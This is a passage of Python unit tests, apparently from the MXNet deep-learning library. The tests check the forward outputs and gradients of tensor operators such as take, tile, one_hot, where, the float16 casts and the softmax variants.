ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
except MXNetError as e:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
i = np.clip(i, 0, data_shape[axis])
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
@with_seed()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
@with_seed()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int32)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx)
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym.simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx)
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
@with_seed()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
@with_seed()
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
@with_seed()
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)])
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1.bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_seed()
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
